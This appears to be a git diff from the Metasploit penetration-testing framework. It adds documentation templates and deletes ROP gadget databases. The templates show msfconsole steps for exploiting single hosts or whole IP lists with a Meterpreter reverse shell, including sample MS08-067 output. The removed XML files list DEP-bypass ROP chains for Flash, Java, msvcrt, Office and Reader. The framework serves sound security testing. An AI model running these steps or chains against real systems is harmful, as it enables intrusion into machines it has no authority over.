msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
Other examples of setting the RHSOTS option:
Example 1:
```
msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.3-192.168.1.200
```
Example 2:
```
msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.1/24
```
Example 3:
```
msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:///tmp/ip_list.txt
```

15
data/markdown_doc/bes_demo_template.erb Normal file
View File

@ -0,0 +1,15 @@
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > run
```
This module is also supported by Browser Autopwn 2.
To load it from Browser Autopwn 2, here's how:
```
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > set INCLUDE_PATTERN <%= mod.shortname %>
INCLUDE_PATTERN => <%= mod.shortname %>
msf auxiliary(browser_autopwn2) > exploit
```

50
data/markdown_doc/default_template.erb Normal file
View File

@ -0,0 +1,50 @@
## <%= items[:mod_name] %>
<p>
<%= normalize_description(items[:mod_description]) %>
</p>
## Module Name
<%= Rex::Text.html_encode(items[:mod_fullname]) %>
## Authors
<%= normalize_authors(items[:mod_authors]) %>
<% unless items[:mod_platforms].empty? %>
## Platforms
<%= normalize_platforms(items[:mod_platforms]) %>
<% end %>
## Reliability
<%= normalize_rank(items[:mod_rank]) %>
## Related Pull Requests
<%= normalize_pull_requests(items[:mod_pull_requests]) %>
<% unless items[:mod_refs].empty? %>
## References
<%= normalize_references(items[:mod_refs]) %>
<% end %>
<% if items[:mod_targets] %>
## Available Targets
<%= normalize_targets(items[:mod_targets]) %>
<% end %>
## Required Options
<% if normalize_options(items[:mod_options]).empty? %>
No options required.
<% else %>
<%= normalize_options(items[:mod_options]) %>
<% end %>
## Basic Usage
<%= normalize_demo_output(items[:mod_demo]) %>

9
data/markdown_doc/generic_demo_template.erb Normal file
View File

@ -0,0 +1,9 @@
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show targets
... a list of targets ...
msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```

68
data/markdown_doc/html_template.erb Normal file
View File

@ -0,0 +1,68 @@
<html>
<head>
<% unless kb.empty? %>
<script>
function showOverview() {
var overview_info_button = document.getElementById('overview_info_button');
overview_info_button.style.borderColor = "#ccc";
overview_info_button.style.color = "#333";
var knowledge_base_button = document.getElementById('knowledge_base_button');
knowledge_base_button.style.borderColor = "#EEEEEE";
knowledge_base_button.style.color = "#C4C4C4";
document.getElementById('knowledge_base').style.display = "none";
document.getElementById('overview_info').style.display = "inline";
}
function showKnowledge() {
var overview_info_button = document.getElementById('overview_info_button');
overview_info_button.style.borderColor = "#EEEEEE";
overview_info_button.style.color = "#C4C4C4";
var knowledge_base_button = document.getElementById('knowledge_base_button');
knowledge_base_button.style.borderColor = "#ccc";
knowledge_base_button.style.color = "#333";
document.getElementById('overview_info').style.display = "none";
document.getElementById('knowledge_base').style.display = "inline";
}
function initDoc() {
var kb = document.getElementById('knowledge_base');
var oi = document.getElementById('overview_info');
oi.style.display = "none";
kb.style.display = "inline";
var kb_button = document.getElementById('knowledge_base_button');
var oi_button = document.getElementById('overview_info_button');
kb_button.style.borderColor = "#ccc";
kb_button.style.color = "#333";
oi_button.style.borderColor = "#EEEEEE";
oi_button.style.color = "#C4C4C4";
}
</script>
<% end %>
<style>
<%= load_css %>
</style>
</head>
<body onload="initDoc()">
<% unless kb.empty? %>
<table border="0">
<tr>
<th>
<div id="overview_info_button" onClick="showOverview()">Overview</a>
</th>
<th>
<div id="knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a>
</th>
</tr></table>
<p></p>
<% end %>
<div id="overview_info">
<%= r.render(md) %>
</div>
<% unless kb.empty? %>
<div id="knowledge_base">
<%= r.render(kb) %>
</div>
<% end %>
</body>
</html>

4
data/markdown_doc/httpserver_demo_template.erb Normal file
View File

@ -0,0 +1,4 @@
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```

14
data/markdown_doc/localexploit_demo_template.erb Normal file
View File

@ -0,0 +1,14 @@
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the ```sessions``` command.
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show targets
... a list of targets ...
msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```

253
data/markdown_doc/markdown.css Normal file
View File

@ -0,0 +1,253 @@
h1, h2, h3, h4, h5, h6, p, blockquote {
margin: 0;
padding: 0;
}
body {
font-family: Arial, "Helvetica Neue", Helvetica, "Hiragino Sans GB", sans-serif;
font-size: 16px;
line-height: 18px;
color: #737373;
margin: 10px 13px 10px 13px;
}
a {
color: #0069d6;
}
a:hover {
color: #0050a3;
text-decoration: none;
}
a img {
border: none;
}
p {
margin-bottom: 16px;
}
h1, h2, h3, h4, h5, h6 {
color: #404040;
line-height: 36px;
}
h1 {
margin-bottom: 18px;
font-size: 30px;
}
h2 {
font-size: 24px;
margin-bottom: 16px;
}
h3 {
font-size: 18px;
margin-bottom: 16px;
}
h4 {
font-size: 16px;
margin-bottom: 16px;
}
h5 {
font-size: 16px;
margin-bottom: 16px;
}
h6 {
font-size: 13px;
margin-bottom: 16px;
}
hr {
margin: 0 0 19px;
border: 0;
border-bottom: 1px solid #eee;
}
blockquote {
padding: 13px 13px 21px 15px;
margin-bottom: 18px;
font-family:georgia,serif;
font-style: italic;
}
blockquote:before {
content:"\201C";
font-size:40px;
margin-left:-10px;
font-family:georgia,serif;
color:#eee;
}
blockquote p {
font-size: 16px;
font-weight: 300;
line-height: 18px;
margin-bottom: 0;
font-style: italic;
}
code, pre {
font-family: Monaco, Andale Mono, Courier New, monospace;
}
code {
background-color: #eee;
color: rgba(0, 0, 0, 0.75);
padding: 1px 3px;
font-size: 13px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
}
pre {
display: block;
margin: 0 0 18px;
line-height: 16px;
font-size: 13px;
border: 1px solid #d9d9d9;
white-space: pre-wrap;
word-wrap: break-word;
}
pre code {
background-color: #fff;
color:#737373;
font-size: 13px;
padding: 0;
}
@media screen and (min-width: 768px) {
body {
width: 748px;
margin:10px auto;
}
}
#overview_info_button {
font-family:Arial, sans-serif;
font-size:16px;
padding:10px 5px;
border-style:solid;
border-width:1px;
border-color:#EEEEEE;
color:#C4C4C4;
}
#knowledge_base_button {
font-family:Arial, sans-serif;
font-size:16px;
padding:10px 5px;
border-style:solid;
border-width:1px;
border-color:#ccc;
color:#333;
}
#overview_info_button:hover, #knowledge_base_button:hover {
cursor: pointer;
}
#long_list {
height:280px;
overflow:auto;
border-style: solid;
border-width: 1px;
border-color: #ccc;
}
/*
Description: Foundation 4 docs style for highlight.js
Author: Dan Allen <dan.j.allen@gmail.com>
Website: http://foundation.zurb.com/docs/
Version: 1.0
Date: 2013-04-02
*/
pre code {
display: block; padding: 0.5em;
background: #eee;
}
pre .decorator,
pre .annotation {
color: #000077;
}
pre .attribute {
color: #070;
}
pre .value,
pre .string,
pre .scss .value .string {
color: #d14;
}
pre .comment {
color: #998;
font-style: italic;
}
pre .function .title {
color: #900;
}
pre .class {
color: #458;
}
pre .id,
pre .pseudo,
pre .constant,
pre .hexcolor {
color: teal;
}
pre .variable {
color: #336699;
}
pre .javadoc {
color: #997700;
}
pre .pi,
pre .doctype {
color: #3344bb;
}
pre .number {
color: #099;
}
pre .important {
color: #f00;
}
pre .label {
color: #970;
}
pre .preprocessor {
color: #579;
}
pre .reserved,
pre .keyword,
pre .scss .value {
color: #000;
}
pre .regexp {
background-color: #fff0ff;
color: #880088;
}
pre .symbol {
color: #990073;
}
pre .symbol .string {
color: #a60;
}
pre .tag {
color: #007700;
}
pre .at_rule,
pre .at_rule .keyword {
color: #088;
}
pre .at_rule .preprocessor {
color: #808;
}
pre .scss .tag,
pre .scss .attribute {
color: #339;
}

8
data/markdown_doc/payload_demo_template.erb Normal file
View File

@ -0,0 +1,8 @@
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > generate
```
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).

44
data/markdown_doc/post_demo_template.erb Normal file
View File

@ -0,0 +1,44 @@
There are two ways to execute this post module.
**From the Meterpreter prompt**
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post
module against that specific session:
```
meterpreter > run <%= mod.fullname %>
```
**From the msf prompt**
The second is by using the "use" command at the msf prompt. You will have to figure out which
session ID to set manually. To list all session IDs, you can use the "sessions" command.
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
```
<ruby>
framework.sessions.each_pair do |sid, session|
run_single("use <%= mod.fullname %>")
run_single("set SESSION #{sid}")
run_single("run")
end
</ruby>
```
2 - At the msf prompt, execute the above resource script:
```
msf > resource path-to-resource-script
```

99
data/markdown_doc/remote_exploit_demo_template.erb Normal file
View File

@ -0,0 +1,99 @@
**Using <%= mod.shortname %> against a single host**
Normally, you can use <%= mod.fullname %> this way:
```
msf > use <%= mod.fullname %>
msf <%= mod.type %>(<%= mod.shortname %>) > show targets
... a list of targets ...
msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id
msf <%= mod.type %>(<%= mod.shortname %>) > show options
... show and set options ...
msf <%= mod.type %>(<%= mod.shortname %>) > exploit
```
**Using <%= mod.shortname %> against multiple hosts**
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your
<%= mod.shortname %> will be using:
1. Do: ```use exploit/multi/handler```
2. Do: ```set PAYLOAD [payload]```
3. Set other options required by the payload
4. Do: ```set EXITONSESSION false```
5. Do: ```run -j```
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and
payload options accordingly:
```
&#x3c;ruby&#x3e;
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use <%= mod.fullname %>")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
&#x3c;/ruby&#x3e;
```
Next, run the resource script in the console:
```
msf > resource [path-to-resource-script]
```
And finally, you should see that the exploit is trying against those hosts similar to the following
MS08-067 example:
```
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
```

0
data/meterpreter/ext_server_android.jar
View File

3043
data/msfpescan/identify.txt
View File

File diff suppressed because it is too large Load Diff

62
data/post/zip/zip.vbs Normal file
View File

@ -0,0 +1,62 @@
On Error Resume Next
Function WindowsZip(sFile, sZipFile)
'This script is provided under the Creative Commons license located
'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
'be used for commercial purposes with out the expressed written consent
'of NateRice.com
Set oZipShell = CreateObject("WScript.Shell")
Set oZipFSO = CreateObject("Scripting.FileSystemObject")
If Not oZipFSO.FileExists(sZipFile) Then
NewZip(sZipFile)
End If
Set oZipApp = CreateObject("Shell.Application")
sZipFileCount = oZipApp.NameSpace(sZipFile).items.Count
aFileName = Split(sFile, "\")
sFileName = (aFileName(Ubound(aFileName)))
'listfiles
sDupe = False
For Each sFileNameInZip In oZipApp.NameSpace(sZipFile).items
If LCase(sFileName) = LCase(sFileNameInZip) Then
sDupe = True
Exit For
End If
Next
If Not sDupe Then
oZipApp.NameSpace(sZipFile).Copyhere sFile
'Keep script waiting until Compressing is done
On Error Resume Next
sLoop = 0
Do Until sZipFileCount < oZipApp.NameSpace(sZipFile).Items.Count
Wscript.Sleep(100)
sLoop = sLoop + 1
Loop
On Error GoTo 0
End If
End Function
Sub NewZip(sNewZip)
'This script is provided under the Creative Commons license located
'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
'be used for commercial purposes with out the expressed written consent
'of NateRice.com
Set oNewZipFSO = CreateObject("Scripting.FileSystemObject")
Set oNewZipFile = oNewZipFSO.CreateTextFile(sNewZip)
oNewZipFile.Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, 0)
oNewZipFile.Close
Set oNewZipFSO = Nothing
Wscript.Sleep(500)
End Sub

80
data/ropdb/flash.xml
View File

@ -1,80 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>11.3.300.257</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x00243043">POP EAX # RETN</gadget>
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
<gadget offset="0x002ed0f1">jmp esp</gadget>
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
<gadget offset="0x00955ebe">Writable location</gadget>
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11.3.300.265</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x00487414">POP EAX # RETN</gadget>
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
<gadget offset="0x002d8d5c">jmp esp</gadget>
<gadget offset="0x00005604">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x004087db">POP ECX # RETN</gadget>
<gadget offset="0x00955197">Writable location</gadget>
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11.3.300.268</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
<gadget offset="0x002b95bb">jmp esp</gadget>
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
<gadget offset="0x0092027a">Writable location</gadget>
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
</gadgets>
</rop>
</db>

66
data/ropdb/hxds.xml
View File

@ -1,66 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>2007</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
<gadget offset="0x0008bfae">Writable location</gadget>
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
<gadget offset="0x0002c840">JMP [EAX]</gadget>
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>2010</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
<gadget offset="0x0008c638">Writable location</gadget>
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
<gadget offset="0x00073335">POP ESI # RETN</gadget>
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
<gadget offset="0x00076452">POP EAX # RETN</gadget>
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
</db>

33
data/ropdb/java.xml
View File

@ -1,33 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>*</target>
</compatibility>
<gadgets base="0x7c340000">
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
<gadget offset="0x00005937">POP EDX # RETN</gadget>
<gadget value="0xffffffc0">0x00000040</gadget>
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
<gadget offset="0x00051e67">Writable location</gadget>
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
<gadget offset="0x000015a2">JMP [EAX]</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
</db>

71
data/ropdb/msvcrt.xml
View File

@ -1,71 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>WINDOWS XP SP2</target>
<target>WINDOWS XP SP3</target>
</compatibility>
<gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>WINDOWS SERVER 2003 SP1</target>
<target>WINDOWS SERVER 2003 SP2</target>
</compatibility>
<gadgets base="0x77ba0000">
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets>
</rop>
</db>

132
data/ropdb/reader.xml
View File

@ -1,132 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>9</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x2313d">pop ecx # ret</gadget>
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x0155a">pop edi # ret</gadget>
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x2d4de">pop ebx # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x44122">mov edx, ecx</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
<gadget offset="0x476ab">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>10</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x05016">pop edi # ret</gadget>
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x14241">pop ebx # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x4b49d">mov edx, ecx</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
